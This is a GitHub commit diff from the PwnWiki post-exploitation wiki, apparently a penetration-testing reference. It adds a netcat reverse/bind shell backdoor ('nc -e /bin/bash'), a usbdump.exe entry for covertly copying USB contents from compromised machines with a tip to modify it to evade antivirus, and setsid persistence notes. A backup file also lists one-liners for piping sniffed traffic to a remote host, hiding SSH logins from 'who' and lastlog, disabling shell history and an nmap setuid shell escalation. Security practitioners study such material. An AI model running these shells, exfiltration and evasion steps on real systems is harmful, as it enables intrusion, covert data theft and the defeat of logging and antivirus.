Skip to content

Commit ab073a6

Browse files
committed
Fixing merge issues
2 parents 3af99b0 + 350c635 commit ab073a6

File tree

11 files changed

+513
-35
lines changed

11 files changed

+513
-35
lines changed

bins/windows.md

Lines changed: 7 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,7 @@
1+
# Useful Windows Binaries
2+
3+
Useful Windows binary tools that can be used for post exploitation.
4+
5+
| Tool | Description / Importance | Contributer |
6+
| ----------- | ------------------------ | ----------- |
7+
| usbdump.exe | Once executed, usbdump will run in the background and will dump the contents of all connected usb devices to a randomly numbered folder within the same directory as the usbdump.exe program. Useful for grabbing the contents of any usb devices later connected to a compromized machine. May have to modify it to bypass AV as its signature is in quite a few AV's. | Ian |

bins/windows/index.md

Lines changed: 7 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,7 @@
1+
# Useful Windows Binaries
2+
3+
Useful Windows binary tools that can be used for post exploitation.
4+
5+
| Tool | Description / Importance | Contributer |
6+
| ----------- | ------------------------ | ----------- |
7+
| usbdump.exe | Once executed, usbdump will run in the background and will dump the contents of all connected usb devices to a randomly numbered folder within the same directory as the usbdump.exe program. Useful for grabbing the contents of any usb devices later connected to a compromized machine. May have to modify it to bypass AV as its signature is in quite a few AV's. | Ian |

index.md

Lines changed: 2 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -8,7 +8,7 @@
88

99
### Live Online Copy:
1010

11-
You can find a copy of the project online at: http://PwnWiki.io
11+
You can find a copy of the project online at: http://pwnwiki.io
1212

1313
### Offline Use:
1414

@@ -32,8 +32,7 @@ Curators:
3232
* [@tekwizz123](https://twitter.com/tekwizz123) [gimmick:TwitterFollow](@tekwizz123)
3333
* [@jakx_](https://twitter.com/jakx_) [gimmick:TwitterFollow](@jakx_)
3434
* [@TheColonial](https://twitter.com/TheColonial) [gimmick:TwitterFollow](@TheColonial)
35-
* [@Wireghoul](https://twitter.com/Wireghoul) [gimmick:TwitterFollow](@Wireghoul)
36-
35+
* [@Wireghoul](https://twitter.com/Wireghoul) [gimmick:TwitterFollow](@Wireghoul)
3736

3837
If you would like to become a curator, please contact [[email protected]](mailto:[email protected])
3938

index.md~

Lines changed: 40 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,40 @@
1+
![](images/logo.jpg)
2+
3+
[Image Generated Here](http://www.addletters.com/pictures/restaurant-sign-generator/4772466.htm#.UplRZ42PuuY)
4+
5+
### PwnWiki.io is a collection TTPs (tools, tactics, and procedures) for what to do after access has been gained.
6+
7+
- - - - - -
8+
9+
### Live Online Copy:
10+
11+
You can find a copy of the project online at: http://pwnwiki.io
12+
13+
### Offline Use:
14+
15+
1. Clone the repository or pull the archive ([download zip](https://github.com/pwnwiki/pwnwiki.github.io/archive/master.zip)) of the repo
16+
2. Open index.html
17+
3. Most modern browsers don't allow the access of local files from a locally loaded HTML file. On Windows you can use [Mongoose Tiny](http://cesanta.com/downloads.html) or [HFS](http://www.rejetto.com/hfs/) to host the files locally. On OSX and Linux `python -m SimpleHTTPServer` seems to work just fine.
18+
19+
#### Referenced tools can be found here: https://github.com/mubix/post-exploitation (If they aren't built into the OS)
20+
21+
- - - - - -
22+
#### Submitting Content
23+
We want/need your help! Please contribute to this project is via GitHub (https://github.com/pwnwiki/pwnwiki.github.io). That allows us to get your project-ready content incorporated into the wiki fast.
24+
25+
We realize that not everyone can/wants to submit content via GitHub and that's cool. If your go-to content is not up here and you don't want to spend the time becoming a Git Jedi, just visit our [Google Form](https://docs.google.com/forms/d/1N7-jRjnUXoz-UwB2h0du2IrskFJW6hBGs4YsTwvEncE/viewform). Due to the large amount of submissions and content, there may be a delay between your posting and us getting your content into the project. Thanks for your submissions and your patience!
26+
27+
- - - - - -
28+
Curators:
29+
30+
* [@mubix](https://twitter.com/mubix)
31+
* [@WebBreacher](https://twitter.com/webbreacher)
32+
* [@tekwizz123](https://twitter.com/tekwizz123)
33+
* [@jakx_](https://twitter.com/jakx_)
34+
* [@TheColonial](https://twitter.com/TheColonial)
35+
* [@Wireghoul](https://twitter.com/Wireghoul)
36+
37+
38+
If you would like to become a curator, please contact [[email protected]](mailto:[email protected])
39+
40+
[gimmick:ForkMeOnGitHub ({ color: 'red', position: 'right' })](http://www.github.com/pwnwiki/pwnwiki.github.io/)

persistence/linux/general.md

Lines changed: 21 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,21 @@
1+
<!-- Code for collapse and expand -->
2+
<script type="text/javascript">
3+
$(document).ready(function() {
4+
$('div.view').hide();
5+
$('div.slide').click(function() {
6+
$(this).next('div.view').slideToggle('fast');
7+
return false;
8+
});
9+
});
10+
</script>
11+
12+
# Linux General Persistence Commands
13+
14+
Commands to run to maintain persistence after you have exploited it and are usually executed from the context of the bash prompt.
15+
16+
###Run command as a daemon
17+
*Note this doesn't work with anything from apache. Runs like & but doesn't care if the parent process closes*
18+
```bash
19+
setsid *command*
20+
```
21+

persistence/linux/general.md~

Lines changed: 21 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,21 @@
1+
<!-- Code for collapse and expand -->
2+
<script type="text/javascript">
3+
$(document).ready(function() {
4+
$('div.view').hide();
5+
$('div.slide').click(function() {
6+
$(this).next('div.view').slideToggle('fast');
7+
return false;
8+
});
9+
});
10+
</script>
11+
12+
# Linux General Persistence Commands
13+
14+
Commands to run to maintain persistence after you have exploited it and are usually executed from the context of the bash prompt.
15+
16+
###Run command as a daemon
17+
*Note this doesn't work with anything from apache*
18+
```bash
19+
setsid *command*
20+
```
21+

persistence/linux/index.md

Lines changed: 5 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,5 @@
1+
# Linux Persistence Commands
2+
3+
Commands that help you maintain control over a compromised system.
4+
5+
* [General Commands](general.md) - Commands your could/should use to maintain your hold on the compromised system.

scripting/bash.md

Lines changed: 21 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -89,12 +89,31 @@ grep -E -o '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'
8989
tcpdump -w - | nc -v 8.8.8.8 9999
9090
```
9191

92-
**Recursively search for files within a directory**
92+
**Recursively search for text contained in files within a directory**
9393
```bash
9494
zcat -rf ./* | grep "searchstring"
9595
```
9696

97+
**Recursively search for files with the specified word within them**
98+
*Submitted by cat on Google Fourms*
99+
```bash
100+
ls -a | find | grep -i "string"
101+
```
102+
103+
**Netcat backdoor**
104+
*Does not work with most distro's default version of netcat (most do not define ENABLE_GAPING_SECURITY_HOLE which turns on -e)*
105+
```bash
106+
nc -e /bin/bash *remotecomputer* *port*
107+
OR
108+
nc -e /bin/bash -lp *port*
109+
```
110+
111+
**View CPU Information**
112+
```bash
113+
cat /proc/cpuinfo
114+
```
115+
97116
Credits
98117
-----------
99-
Credits to @TheAndrewBalls for posting some awsome one liners (the hidden SSH example and the DNS enumeration are both his contributions
118+
Credits to @TheAndrewBalls for posting some awsome one liners (the hidden SSH example and the DNS enumeration are both his contributions)
100119

scripting/bash.md~

Lines changed: 113 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,113 @@
1+
# Bash Commands for Post Exploitation
2+
3+
One liners
4+
-----------
5+
6+
**Resolve a list of hostnames to IP addresses**
7+
```bash
8+
awk < hostnames.txt '{ system("resolveip -s " $1) }'
9+
```
10+
11+
**IIS 6.0 IP Disclosure**
12+
```bash
13+
curl -l -O -H "Host:" "example.com"
14+
```
15+
16+
**Connect to SSL websites**
17+
```bash
18+
openssl s_client -connect example.com:443
19+
```
20+
21+
**Convert base64 to text**
22+
```bash
23+
echo 'base64string' | base64 -d (Use -D on OSX)
24+
```
25+
26+
**Decode ASCII shellcode**
27+
```bash
28+
echo -e *shellcode hex string* (may need to use -i to ignore bad chars)
29+
```
30+
31+
**Enumerate DNS of Class C**
32+
```bash
33+
for ip in $(seq 1 254); do; host 10.1.1.$ip | grep "name pointer"; done
34+
```
35+
36+
**SSH to box and hide from "who" and "lastlog"**
37+
```bash
38+
ssh [email protected] -T /bin/bash
39+
```
40+
41+
**Prevent terminal logging**
42+
```bash
43+
unset HISTFILE
44+
```
45+
46+
**Add immutable attribute to a unix file**
47+
```bash
48+
chattr +i *file*
49+
```
50+
51+
**SSH into host2 through host1**
52+
```bash
53+
ssh -o "proxycommand ssh -W host2 host1" host2
54+
```
55+
56+
**Nmap setuid privesc**
57+
```bash
58+
nmap --script <(echo 'os.execute("/bin/sh")')
59+
nmap --interactive (for older versions)
60+
```
61+
62+
**Transfer files through SSH**
63+
```bash
64+
ssh [email protected] "cat test.tar.gz" > test.tar.gz
65+
```
66+
67+
**Internal port redirect for bypassing services**
68+
```bash
69+
iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 4444
70+
```
71+
72+
**Enable forwarding on the fly**
73+
```bash
74+
sysctl -w net.ipv4.ip_forward=1
75+
```
76+
77+
**Kill with USR1 developer defined signal**
78+
```bash
79+
kill -USR1 <pid>
80+
```
81+
82+
**Pull IP addresses from a file**
83+
```bash
84+
grep -E -o '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'
85+
```
86+
87+
**Sniff traffic with tcpdump and send to remote tcp socket**
88+
```bash
89+
tcpdump -w - | nc -v 8.8.8.8 9999
90+
```
91+
92+
**Recursively search for text contained in files within a directory**
93+
```bash
94+
zcat -rf ./* | grep "searchstring"
95+
```
96+
97+
**Recursively search for files with the specified word within them**
98+
*Submitted by cat on Google Fourms*
99+
```bash
100+
ls -a | find | grep -i "string"
101+
```
102+
103+
**Netcat backdoor**
104+
```bash
105+
nc -e /bin/bash *remotecomputer* *port*
106+
OR
107+
nc -e /bin/bash -lp *port*
108+
```
109+
110+
Credits
111+
-----------
112+
Credits to @TheAndrewBalls for posting some awsome one liners (the hidden SSH example and the DNS enumeration are both his contributions)
113+

0 commit comments

Comments
 (0)